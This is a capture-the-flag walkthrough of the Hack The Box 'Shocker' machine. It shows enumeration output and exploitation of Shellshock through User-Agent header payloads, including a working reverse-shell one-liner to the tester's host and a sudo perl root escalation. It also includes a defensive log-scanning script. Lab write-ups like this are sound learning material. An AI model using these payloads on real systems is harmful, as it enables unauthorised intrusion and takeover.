Redhalo

hack the box walkthrough – shocker machine

New walkthrough about a Hack The Box machine: Shocker. A bit old, as it was released a while ago, but still fun, and it was a good introduction to the Shellshock vulnerability.

Let’s jump in!

enumeration

As usual we start our enumeration with an nmap command:

[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.56.222 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-29 10:52 EST
Nmap scan report for 10.129.56.222
Host is up (0.028s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.40 seconds

Two ports are open: 80/http and 2222/ssh.

A quick look at the HTTP site with Firefox gives us a single image:

Nothing really interesting..

Let’s have a look with dirbuster to see if we find something else:

At first sight, nothing else..

Let’s see with a nikto scan:

[email protected]:~/Documents$ nikto --url http://10.129.56.222
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.56.222
+ Target Hostname:    10.129.56.222
+ Target Port:        80
+ Start Time:         2020-11-29 11:00:09 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-11-29 11:05:06 (GMT-5) (297 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing either.. Let’s remember the machine name: shocker.. shock.. shellshock?!

Let’s do another dirbuster scan on the cgi-bin folder found previously:

Bingo! A file user.sh has been found!

FOOTHOLD

Let’s see if it’s vulnerable to Shellshock. I had a successful return with a ping request.

I ran tcpdump on my Kali machine to trace received pings with the following command:

[email protected]:~$ sudo tcpdump -i tun0 -n icmp

Then I edited the HTTP request via Burp Suite to include a ping command in the HTTP User-Agent header (a CGI server exports request headers as environment variables, which is exactly what a vulnerable bash parses):

() { :; }; /bin/bash -c 'ping -c 3 10.10.14.65'

and got the following result:

[email protected]:~$ sudo tcpdump -i tun0 -n icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
11:59:09.780324 IP 10.129.62.249 > 10.10.14.65: ICMP echo request, id 1799, seq 1, length 64
11:59:09.780363 IP 10.10.14.65 > 10.129.62.249: ICMP echo reply, id 1799, seq 1, length 64
11:59:10.780459 IP 10.129.62.249 > 10.10.14.65: ICMP echo request, id 1799, seq 2, length 64
11:59:10.780504 IP 10.10.14.65 > 10.129.62.249: ICMP echo reply, id 1799, seq 2, length 64

Seems good to me!
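To make the mechanism above concrete from the defender's side, here is an added example that is not part of the original write-up: it reproduces how a CGI server turns request headers into environment variables (the reason a User-Agent string reaches bash at all), and scans Apache access-log lines for the function-definition prefix that Shellshock payloads start with. The log lines are constructed for illustration and assume Apache's default "combined" LogFormat; the payload in the third line is the ping one used above.

```python
"""Detect Shellshock-style function-definition payloads in CGI request headers.

Added example (not part of the original write-up). It assumes Apache's
default "combined" LogFormat for the sample lines; the log lines below are
constructed for illustration.
"""
import re
from typing import Dict, List

# Shellshock (CVE-2014-6271 family) abuses bash importing any environment
# variable whose value begins with a function definition "() {"; a CGI server
# copies request headers into exactly such variables (RFC 3875, section 4.1.18).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def cgi_environ(headers: Dict[str, str]) -> Dict[str, str]:
    """Map HTTP request headers to CGI meta-variables the way a CGI server does.

    Every header becomes HTTP_<NAME> (uppercased, '-' replaced by '_'); the two
    body headers are exported without the prefix. This is the path by which a
    User-Agent string ends up in the environment of /cgi-bin/user.sh.
    """
    env = {}
    for name, value in headers.items():
        key = name.upper().replace("-", "_")
        if key in ("CONTENT_TYPE", "CONTENT_LENGTH"):
            env[key] = value
        else:
            env["HTTP_" + key] = value
    return env


def is_shellshock_payload(value: str) -> bool:
    """True if a header value carries the bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def shellshock_hits(env: Dict[str, str]) -> List[str]:
    """Names of CGI environment variables whose values look like payloads."""
    return sorted(k for k, v in env.items() if is_shellshock_payload(v))


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Flag combined-format access-log lines whose Referer or User-Agent would
    have reached a CGI script as a Shellshock payload."""
    hits = []
    for line in lines:
        m = COMBINED_LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        env = cgi_environ({"Referer": m["referer"], "User-Agent": m["ua"]})
        for var in shellshock_hits(env):
            hits.append({"ip": m["ip"], "path": m["path"], "field": var, "value": env[var]})
    return hits


# Constructed sample log lines: two ordinary requests and one carrying the
# ping payload from the write-up in the User-Agent header.
SAMPLE_LOG = [
    '10.10.14.65 - - [29/Nov/2020:11:55:02 -0500] "GET / HTTP/1.1" 200 137 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) rv:84.0"',
    '10.10.14.65 - - [29/Nov/2020:11:58:41 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) rv:84.0"',
    '10.10.14.65 - - [29/Nov/2020:11:59:09 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" '
    '"() { :; }; /bin/bash -c \'ping -c 3 10.10.14.65\'"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['path']}: {hit['field']} = {hit['value']!r}")
```

The regex is deliberately looser than bash's own check (bash only imported values that began with exactly `() {`), so padded or reformatted variants in logs are still surfaced; the real fix is a patched bash, the scan only tells you whether anyone tried.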

After several tries, I used the following command to get a reverse shell:

() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.65/1337 0>&1'
[email protected]:~$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.65] from (UNKNOWN) [10.129.62.249] 42724
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly

PRIVILEGE ESCALATION

Then with a linpeas scan, I got the following information:
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

Seems easy then..

shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
sudo perl -e 'exec "/bin/sh";'
whoami
root

And we are root!